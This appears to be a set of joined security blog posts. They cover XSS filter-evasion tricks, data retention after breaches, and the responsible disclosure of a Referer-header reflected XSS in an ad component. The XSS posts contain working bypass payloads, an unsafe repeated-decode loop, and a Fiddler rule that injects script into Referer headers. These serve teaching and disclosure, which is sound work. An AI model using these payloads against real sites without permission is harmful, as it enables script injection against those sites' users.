Ways you haven’t stopped my XSS, Number 3 – helped by the browser / website

Apologies for not having written one of these in a while, but I find that one of the challenges here is to not release details about vulnerable sites while they’re still vulnerable – and it can take oh, so long for web developers to get around to fixing these vulnerabilities.

And when they do, often there’s more work to be done, as the fixes are incomplete, incorrect, or occasionally worse than the original problem.

Sometimes, though, the time goes so slowly, and the world moves on in such a way that you realise nobody’s looking for the vulnerable site, so publishing details of its flaws without publishing details of its identity, should be completely safe.

Helped by the website

So, what sort of attack is actively aided by the website?

Overly-verbose error messages

My favourite “helped by the website” issues are error messages which will politely inform you how your attack failed, and occasionally what you can do to fix it.

Here’s an SQL example:

image

OK, so now I know I have a SQL statement that contains the sequence “' order by type asc, sequence desc” – that tells me quite a lot. There are two fields called “type” and “sequence”. And my single injected quote was enough to demonstrate the presence of SQL injection.

What about XSS help?

There’s a few web sites out there who will help you by telling you which characters they can’t handle in their search fields:

image

Now, the question isn’t “what characters can I use to attack the site?”, but “how do I get those characters into the site. [Usually it’s as simple as typing them into the URL instead of using the text box, sometimes it’s simply a matter of encoding]

Over-abundance of encoding / decoding

On the subject of encoding and decoding, I generally advise developers that they should document interface contracts between modules in their code, describing what the data is, what format it’s in, and what isomorphic mapping they have used to encode the data so that it is not possible to confuse it with its surrounding delimiters or code, and so that it’s possible to get the original string back.

An isomorphism, or 1:1 (“one to one”) mapping, in data encoding terms, is a means of making sure that each output can only correspond to one possible input, and vice versa.

Without these contracts, you find that developers are aware that data sometimes arrives in an encoded fashion, and they will do whatever it takes to decode that data. Data arrives encoded? Decode it. Data arrives doubly-encoded? Decode it again. Heck, take the easy way out, as this section of code did:
var input, output;
parms = document.location.search.substr(1).split("&");
input = parms[1];
while (input != output) {
    output = input;
    input = unescape(output);
}

[That’s from memory, so I apologise if it’s a little incorrect in many, many other ways as well.]

Yes, the programmer had decided to decode the input string until he got back a string that was unchanged.

This meant that an attacker could simply provide a multiply-encoded attack sequence which gets past any filters you have, such as WAFs and the like, and which the application happily decodes for you.

Granted, I don’t think WAFs are much good, compared to actually fixing the code, but they can give you a moment’s piece to fix code, as long as your code doesn’t do things to actively prevent the WAF from being able to help.

Multiple tiers, each decoding

This has essentially the same effect as described above. The request target for an HTTP request may be percent-encoded, and when it is, the server is required to treat it equivalently to the decoded target. This can sometimes have the effect that each server in a multi-tiered service will decode the HTTP request once, achieving the multiple-decode WAF traversal I talk about above.

Spelling correction

image

OK, that’s illustrative, and it illustrates that Google doesn’t fall for this crap.

But it’s interesting how you’ll find occasionally that such a correction results in executing code.

Stopwords and notwords in searches

When finding XSS in searches, we often concentrate on failed searches – after all, in most product catalogues, there isn’t an item called “<script>prompt()</script>” – unless we put it there on a previous attack.

But often the more complex (and easily attacked) code is in the successful search results – so we want to trigger that page.

Sometimes there’s something called “script”, so we squeak that by (there’s a band called “The Script”, and very often writing on things is desribed as being in a “script” font), but now we have to build Javascript with other terms that match the item on display when we find “script”. Fortunately, there’s a list of words that most search engines are trained to ignore – they are called “stopwords”. These are words that don’t impact the search at all, such as “the”, “of”, “to”, “and”, “by”, etc – words that occur in such a large number of matching items that it makes no sense to allow people to search on those words. Often colours will appear in the list of stopwords, along with generic descriptions of items in the catalogue (“shirt”, “book”, etc).

Well, “alert” is simply “and”[0]+”blue”[1]+”the”[2]+”or”[1]+”the”[0], so you can build function names quickly from stopwords. Once you have String.FromCharCode as a function object, you can create many more strings and functions more quickly. For an extreme example of this kind of “building Javascript from minimal characters”, see this page on how to create all JavaScript from eight basic characters (none of which are alphabetical!)

“Notwords” aren’t a thing, but made the title seem more interesting – sometimes it’d be nice to slip in a string that isn’t a stopword, and isn’t going to be found in the search results. Well, many search functions have a grammar that allow us to say things like “I’d like all your teapots except for the ones made from steel” – or more briefly, “teapot !steel”.

How does this help us execute an attack?

Well, we could just as easily search for “<script> !prompt() </script>” – valid JavaScript syntax, which means “run the prompt() function, and return the negation of its result”. Well, too late, we’ve run our prompt command (or other commands). I even had “book !<script> !prompt()// !</script>” work on one occasion.

Helped by the browser

So, now that we’ve seen some examples of the server or its application helping us to exploit an XSS, what about the browser?

Carry on parsing

One of the fun things I see a lot is servers blocking XSS by ensuring that you can’t enter a complete HTML tag except for the ones they approve of.

So, if I can’t put that closing “>” in my attack, what am I to do? I can’t just leave it out.

Well, strange things happen when you do. Largely because most web pages are already littered with closing angle brackets – they’re designed to close other tags, of course, not the one you’ve put in, but there they are anyway.

So, you inject “<script>prompt()</script>” and the server refuses you. You try “<script prompt() </script” and it’s allowed, but can’t execute.

So, instead, try a single tag, like “<img src=x onerror=prompt()>” – it’s rejected, because it’s a complete tag, so just drop off the terminating angle bracket. “<img src=x onerror=prompt()” – so that the next tag doesn’t interfere, add an extra space, or an “x=”:

<img src=x onerror=prompt() x=

If that gets injected into a <p> tag, it’ll appear as this:

<p><img src=x onerror=prompt() x=</p>

How’s your browser going to interpret that? Simple – open p tag, open img tag with src=x, onerror=prompt() and some attribute called “x”, whose value is “</p”.

If confused, close a tag automatically

Occasionally, browser heuristics and documented standards will be just as helpful to you as the presence of characters in the web page.

Can’t get a “/” character into the page? Then you can’t close a <script> tag. Well, that’s OK, because the <svg> tag can include scripts, and is documented to end at the next HTML tag that isn’t valid in SVG. So… “<svg><script>prompt()<p>” will happily execute as if you’d provided the complete “<svg><script>prompt()</script></svg><p>”

There are many other examples where the browser will use some form of heuristic to “guess” what you meant, or rather to guess what the server meant with the code it sends to the browser with your injected data. See what happens when you leave your attack half-closed.

Can’t comment with // ? Try other comments

When injecting script, you often want to comment the remaining line after your injection, so it isn’t parsed – a failing parse results in none of your injected code being executed.

So, you try to inject “//” to make the rest of the line a comment. Too bad, all “/” characters are encoded or discarded.

Well, did you know that JavaScript in HTML treats “<!—” as a perfectly valid equivalent?

Different browsers help in different ways

Try attacks in different browsers, they each behave in subtly different ways.

Firefox doesn’t have an XSS filter. So it won’t prevent XSS attacks that way.

IE 11 doesn’t encode URI elements, so will sometimes work when your attack would otherwise be encoded.

Chrome – well, I don’t use Chrome often enough to comment on its quirks. Too irritated with it trying to install on my system through Adobe Flash updates.

Well, I think that’s enough for now.

Why didn’t you delete my data?

The recent hack of Ashley Madison, and the subsequent discussion, reminded me of something I’ve been meaning to talk about for some time.

Can a web site ever truly delete your data?

This is usually expressed, as my title suggests, by a user asking the web site who hosted that user’s account (and usually directly as a result of a data breach) why that web site still had the user’s data.

This can be because the user deliberately deleted their account, or simply because they haven’t used the service in a long time, and only remembered that they did by virtue of a breach notification letter (or a web site such as Troy Hunt’s haveibeenpwned.com).

1. Is there a ‘delete’ feature?

Web sites do not see it as a good idea to have a ‘delete’ feature for their user accounts – after all, what you’re asking is for a site to devote developer resources to a feature that specifically curtails the ability of that web site to continue to make money from the user.

To an accountant’s eye (or a shareholder’s), that’s money out the door with the prospect of reducing money coming in.

To a user’s eye, it’s a matter of security and trust. If the developer deliberately misses a known part of the user’s lifecycle (sunset and deprecation are both terms developers should be familiar with), it’s fairly clear that there are other things likely to be missing or skimped on. If a site allows users to disconnect themselves, to close their accounts, there’s a paradox that says more users will choose to continue their service, because they don’t feel trapped.

So, let’s assume there is a “delete” or “close my account” feature – and that it’s easy to use and functional.

2. Is there a ‘whoops’ feature for the delete?

In the aftermath of the Ashley Madison hack, I’m sure there’s going to be a few partners who are going to engage in retributive behaviours. Those behaviours could include connecting to any accounts that the partners have shared, and cause them to be closed, deleted and destroyed as much as possible. It’s the digital equivalent of cutting the sleeves off the cheating partner’s suit jackets. Probably.

Assuming you’ve finally settled down and broken/made up, you’ll want those accounts back under your control.

So there might need to be a feature to allow for ‘remorse’ over the deletion of an account. Maybe not for the jealous partner reason, even, but perhaps just because you forgot about a service you were making use of by that account, and which you want to resurrect.

OK, so many sites have a ‘resurrect’ function, or a ‘cool-down’ period before actually terminating an account.

Facebook, for instance, will not delete your account until you’ve been inactive for 30 days.

3. Warrants to search your history

Let’s say you’re a terrorist. Or a violent criminal, or a drug baron, or simply someone who needs to be sued for slanderous / libelous statements made online.

OK, in this case, you don’t WANT the server to keep your history – but to satisfy warrants of this sort, a lawyer is likely to tell the server’s operators that they have to keep history for a specific period of time before discarding them. This allows for court orders and the like to be executed against the server to enforce the rule of law.

So your server probably has to hold onto that data for more than the 30 day inactive period. Local laws are going to put some kind of statute on how long a service provider has to hold onto your data.

As an example, a retention notice served under the UK’s rather steep RIPA law could say the service provider has to hold on to some types of data for as much as 12 months after the data is created.

4. Financial and Business records

If you’ve paid for the service being provided, those transaction details have to be held for possible accounting audits for the next several years (in the US, between 3 and 7 years, depending on the nature of the business, last time I checked).

Obviously, you’re not going to expect an audit to go into complete investigations of all your individual service requests – unless you’re billed to that level. Still, this record is going to consist of personal details of every user in the system, amounts paid, service levels given, a la carte services charged for, and some kind of demonstration that service was indeed provided.

So, even if Ashley Madison, or whoever, provided a “full delete” service, there’s a record that they have to keep somewhere that says you paid them for a service at some time in the past.

Eternal data retention – is it inevitable?

I don’t think eternal data retention is appropriate or desirable. It’s important for developers to know data retention periods ahead of time, and to build them into the tools and services they provide.

Data retention shouldn’t be online

Hackers fetch data from online services. Offline services – truly offline services – are fundamentally impossible to steal over the network. An attacker would have to find the facility where they’re stored, or the truck the tapes/drives are traveling in, and steal the data physically.

Not that that’s impossible, but it’s a different proposition from guessing someone’s password and logging into their servers to steal data.

Once data is no longer required for online use, and can be stored, move it into a queue for offline archiving. Developers should make sure their archivist has a data destruction policy in place as well, to get rid of data that’s just too old to be of use. Occasionally (once a year, perhaps), they should practice a data recovery, just to make sure that they can do so when the auditors turn up. But they should also make sure that they have safeguards in place to prevent/limit illicit viewing / use of personal data while checking these backups.

Not everything has to be retained

Different classifications of data have different retention periods, something I alluded to above. Financial records are at the top end with seven years or so, and the minutiae of day-to-day conversations can probably be deleted remarkably quickly. Some services actually hype that as a value of the service itself, promising the messages will vanish in a snap, or like a ghost.

When developing a service, you should consider how you’re going to classify data so that you know what to keep and what to delete, and under what circumstances. You may need a lawyer to help with that.

Managing your data makes service easier

If you lay the frameworks in place when developing a service, so that data is classified and has a documented lifecycle, your service naturally becomes more loosely coupled. This makes it smoother to implement, easier to change, and more compartmentalised. This helps speed future development.

Providing user lifecycle engenders trust and loyalty

Users who know they can quit are more likely to remain loyal (Apple aside). If a user feels hemmed in and locked in place, all that’s required is for someone to offer them a reason to change, and they’ll do so. Often your own staff will provide the reason to change, because if you’re working hard to keep customers by locking them in, it demonstrates that you don’t feel like your customers like your service enough to stay on their own.

So, be careful who you give data to

Yeah, I know, “to whom you give data”, thanks, grammar pedants.

Remember some basic rules here:

1. Data wants to be free

Yeah, and Richard Stallmann’s windows want to be broken.

Data doesn’t want anything, but the appearance is that it does, because when data is disseminated, it essentially cannot be returned. Just like if you go to RMS’s house and break all his windows, you can’t then put the glass fragments back into the frames.

Developers want to possess and collect data – it’s an innate passion, it seems. So if you give data to a developer (or the developer’s proxy, any application they’ve developed), you can’t actually get it back – in the sense that you can’t tell if the developer no longer has it.

2. Sometimes developers are evil – or just naughty

Occasionally developers will collect and keep data that they know they shouldn’t. Sometimes they’ll go and see which famous celebrities used their service recently, or their ex-partners, or their ‘friends’ and acquaintances.

3. Outside of the EU, your data doesn’t belong to you

EU data protection laws start from the basic assumption that factual data describing a person is essentially the non-transferrable property of the person it describes. It can be held for that person by a data custodian, a business with whom the person has a business relationship, or which has a legal right or requirement to that data. But because the data belongs to the person, that person can ask what data is held about them, and can insist on corrections to factual mistakes.

The US, and many other countries, start from the premise that whoever has collected data about a person actually owns that data, or at least that copy of the data. As a result, there’s less emphasis on openness about what data is held about you, and less access to information about yourself.

Ideally, when the revolution comes and we have a socialist government (or something in that direction), the US will pick up this idea and make it clear that service providers are providing a service and acting only as a custodian of data about their customers.

Until then, remember that US citizens have no right to discover who’s holding their data, how wrong it might be, or to ask for it to be corrected.

4. No one can leak data that you don’t give them

Developers should also think about this – you can’t leak data you don’t hold. Similarly, if a user doesn’t give data, or gives incorrect or value-less data, if it leaks, that data is fundamentally worthless.

The fallout from the Ashley Madison leak is probably reduced significantly by the number of pseudonyms and fake names in use. Probably.

Hey, if you used your real name on a cheating web site, that’s hardly smart. But then, as I said earlier today, sometimes security is about protecting bad people from bad things happening to them.

5. Even pseudonyms have value

You might use the same nickname at several places; you might provide information that’s similar to your real information; you might link multiple pseudonymous accounts together. If your data leaks, can you afford to ‘burn’ the identity attached to the pseudonym?

If you have a long message history, you have almost certainly identified yourself pretty firmly in your pseudonymous posts, by spelling patterns, word usages, etc.

Leaks of pseudonymous data are less problematic than leaks of eponymous data, but they still have their problems. Unless you’re really good at OpSec.

Finally

Finally, I was disappointed earlier tonight to see that Troy had already covered some aspects of this topic in his weekly series at Windows IT Pro, but I think you’ll see that his thoughts are from a different direction than mine.

Hack Your Friends Next

My buddy Troy Hunt has a popular PluralSight training class called “Hack Yourself First”. This is excellent advice, as it addresses multiple ideas:

  • You have your own permission to hack your own site, which means you aren’t getting into trouble
  • Before looking outward, you get to see how good your own security is
  • Hacking yourself makes it less likely that when you open up to the Internet, you’ll get pwned
  • By trying a few attacks, you’ll get to see what things an attacker might try and how to fend them off

Plenty of other reasons, I’m sure. Maybe I should watch his training.

Every now and again, though, I’ll hack my friends as well. There are a few reasons for this, too:

  • I know enough not to actually break a site – this is important
  • My friends will generally rather hear from me than an attacker that they have an obvious flaw
  • Tools that I use to find vulnerabilities sometimes stay enabled in the background
  • It’s funny

Such is the way with my recent visit to troyhunt.com – I’ve been researching reflected XSS issues caused by including script in the Referrer header.

What’s the Referrer header?

Actually, there’s two places that hold the referrer, and it’s important to know the difference between them, because they get attacked in different ways, and attacks can be simulated in different ways.

The Referrer header (actually misspelled as “Referer”) is an HTTP header that the browser sends as part of its request for a new web page. The Referrer header contains a URL to the old page that the browser had loaded and which triggered the browser to fetch the new page.

There are many rules as to when this Referrer header can, and can’t, be sent. It can’t be sent if the user typed a URL. It can’t be sent if the target is HTTP, but the source was HTTPS. But there are still enough places it can be sent that the contents of the Referer header are a source of significant security concern – and why you shouldn’t EVER put sensitive data in the URL or query parameters, even when sending to an HTTPS destination. Even when RESTful.

Forging the Referer when attacking a site is a simple matter of opening up Fiddler (or your other favourite scriptable proxy) and adding a new automatic rule to your CustomRules.js, something like this:

// AMJ
    if (oSession.oRequest.headers.Exists("Referer"))
        {
            if (oSession.oRequest.headers["Referer"].Contains("?"))
                oSession.oRequest.headers["Referer"] += "&\"-prompt()-\"";
            else
                oSession.oRequest.headers["Referer"] += "?\"-prompt()-\"";
        }
        else
            oSession.oRequest.headers["Referer"] = "http://www.example.com?\"-prompt()-\"";

Something like this code was in place when I visited other recently reported vulnerable sites, but Troy’s I hit manually. Because fun.

JavaScript’s document.referrer

The other referrer is in Javascript, the document.referrer field. I couldn’t find any rules about when this is, or isn’t available. That suggests it’s available for use even in cases where the HTTP Referer header believes it is not safe to do so, at least in some browser or other.

Forging this is harder, and I’m not going to delve into it. I want you to know about it in case you’ve used the Referer header, and referrer-vulnerable code isn’t triggering. Avoids tearing your hair out.

Back to the discovery

So, lately I’ve been testing sites with a URL ending in the magic string ?"-prompt()-" – and happened to try it at Troy’s site, among others.

I’d seen a pattern of adsafeprotected.com advertising being vulnerable to this issue. [It’s not the only one by any means, but perhaps the most prevalent]. It’s difficult accurately reproducing this issue, because advertising mediators will send you to different advertisers each time you visit a site.

And so it was with great surprise that I tried this on Troy’s site and got an immediate hit. Partly because I know Troy will have already tried this on his own site.

Through a URL parameter, I’m injecting script into a hosted component that unwisely includes the Referer header’s contents in its JavaScript without encoding and/or quoting it first.

It’s ONLY Reflected XSS

I hear that one all the time – no big deal, it’s only a reflected XSS, the most you can do with this is to abuse yourself.

Kind of, yeah. Here’s some of my reasons why Reflected XSS is important:

  • It’s an obvious flaw – it suggests your code is weak all over
  • It’s easy to fix – if you don’t fix the easy flaws, do you want me to believe you fix the hard ones?
  • An attacker can send a link to your trusted web site in a spam email, and have thousands of your users clicking on it and being exploited
  • It’s like you’ve hired a new developer on your web site – the good news is, you don’t have to pay them. The bad news is, they don’t turn up to design meetings, and may have completely different ideas about how your web site should work
  • The attacker can change content as displayed to your users without you knowing what changes are made
  • The attacker can redirect your users to other malicious websites, or to your competitors
  • The attacker can perform network scans of your users’ systems
  • The attacker can run keylogging – capturing your users’ username and password, for instance
  • The attacker can communicate with your users – with your users thinking it’s you
  • A reflected XSS can often become stored XSS, because you allow users of your forums / reviews / etc to post links to your site “because they’re safe, trusted links”
  • Once an attacker convinces one of your staff to visit the reflected XSS, the attack becomes internal. Your staff will treat the link as “trusted” and “safe”
  • Any XSS will tend to trump your XSRF protections.

So, for multiple values of “self” outside the attacker, you can abuse yourself with Reflected XSS.

Contacting the vendor and resolving

With all security research, there comes a time when you want to make use of your findings, whether to garner yourself more publicity, or to earn a paycheck, or simply to notify the vendor and have them fix something. I prefer the latter, when it’s possible / easy.

Usually, the key is to find an email address at the vulnerable domain – but security@adsafeprotected.com wasn’t working, and I couldn’t find any hints of an actual web site at adsafeprotected.com for me to go look at.

Troy was able to start from the other direction – as the owner of a site showing these adverts, he contacted the advertising agent that puts ads onto his site, and get them to fix the issue.

“Developer Media” was the name of the group, and their guy Chris quickly got onto the issue, as did Jamie from Integral Ads, the owners of adsafeprotected.com. Developer Media pulled adsafeprotected as a source of ads, and Integral Ads fixed their code.

Sites that were previously vulnerable are now not vulnerable – at least not through that exact attack.

I count that as a win.

There’s more to learn here

Finally, some learning.

1. Reputational risk / impact

Your partners can bring you as much risk as your own developers and your own code. You may be able to transfer risk to them, but you can’t transfer reputational risk as easily. With different notifications, Troy’s brand could have been substantially damaged, as could Developer Media’s and Integral Ads’. As it is, they all responded quickly, quietly and appropriately, reducing the reputational impact.

[As for my own reputational impact – you’re reading this blog entry, so that’s a positive.]

2. Good guy / bad guy hackers

This issue was easy to find. So it’s probably been in use for a while by the bad guys. There are issues like this at multiple other sites, not related to adsafeprotected.

So you should test your site and see if it’s vulnerable to this, or similar, code. If you don’t feel like you’ll do a good job, employ a penetration tester or two.

3. Reducing risk by being paranoid (iframe protection)

There’s a thin line between “paranoia” and “good security practice”. Troy’s blog uses good security practice, by ensuring that all adverts are inside an iframe, where they can’t execute in Troy’s security context. While I could redirect his users, perhaps to a malicious or competing site, I wasn’t able to read his users’ cookies, or modify content on his blog.

There were many other hosts using adsafeprotected without being in an iframe.

Make it a policy that all externally hosted content (beyond images) is required to be inside of an iframe. This acts like a firewall between your partners and you.

4. Make yourself findable

If you’re a developer, you need to have a security contact, and that contact must be findable from any angle of approach. Security researchers will not spend much time looking for your contact information.

Ideally, for each domain you handle, have the address security@example.com (where you replace “example.com” with your domain) point to a monitored email address. This will be the FIRST thing a security researcher will try when contacting you. Finding the “Contact Us” link on your web page and filling out a form is farther down on the list of things a researcher will do. Such a researcher usually has multiple findings they’re working on, and they’ll move on to notifying someone else rather than spend time looking for how to notify you.

5. Don’t use “safe”, “secure”, “protected” etc in your domain name

This just makes it more ironic when the inevitable vulnerability is found.

6. Vulns protected by XSS Filter are still vulns

As Troy notes, I did have to disable the XSS Filter in order to see this vuln happen.

That doesn’t make the vuln any less important to fix – all it means is that to exploit it, I have to find customers who have also disabled the XSS Filter, or find a way to evade the filter.

There are many sites advising users how to disable the XSS Filter, for various (mostly specious) reasons, and there are new ways every day to evade the filter.

7. Ad security is HARD

The web ad industry is at a crisis point, from my perspective.

Flash has what appear to be daily vulnerabilities, and yet it’s still seen to be the medium of choice for online advertising.

Even without vulnerabilities in Flash, its programmability lends it to being used by bad guys to distribute malicious software. There are logic-based and time-based exploits (display a ‘good’ ad when inspected by the ad hosting provider; display a bad ad, or do something malicious when displayed on customers’ computers) which attackers will use to ensure that their ad passes rigorous inspection, but still deploys bad code to end users.

Any ad that uses JavaScript is susceptible to common vulnerability methods.

Ad blockers are being run by more and more people – even institutions (one college got back 40% of their network bandwidth by employing ad blocking).

Web sites need to be funded. If you’re not paying for the content, someone is. How is that to be done except through advertising? [Maybe you have a good idea that hasn’t been tried yet]

8. Timing of bug reports is a challenge

I’ll admit, I was bored when I found the bug on Troy’s site on a weekend. I decided to contact him straight away, and he responded immediately.

This led to Developer Media being contacted late on a Sunday.

This is not exactly friendly of me and Troy – but at least we didn’t publish, and left it to the developers to decide whether to treat this as a “fire drill”.

A good reason, indeed, to use responsible / coordinated disclosure, and make sure that you don’t publish until teams are actively working on / have resolved the problem.

9. Some browsers are safer – that doesn’t mean your web site is safe

There are people using old and poorly configured browsers everywhere. Perhaps they make up .1% of your users. If you have 100,000 users, that’s a hundred people who will be affected by issues with those browsers.

Firefox escaped because it encoded the quote characters to %22, and the server at adsafeprotected didn’t decode them. Technically, adsafeprotected’s server is not RFC compliant because of this, so Firefox isn’t really protecting anyone here.

Chrome escaped because it encoded the quote characters AND has an XSS filter to block things like my attack. This is not 100% safe, and can be disabled easily by the user.

Internet Explorer up to version 11 escaped if you leave the XSS Filter turned on.

Microsoft Edge in Windows 10 escaped because it encodes the quote characters and has a robust XSS Filter that, as far as I can tell, you can’t turn off.

All these XSS filters can be turned off by setting a header in network traffic.

Nobody would do that.

Until such time as one of these browsers has a significant flaw in their XSS filter.

So, don’t rely on the XSS Filter to protect you – it can’t be complete, and it may wind up being disabled.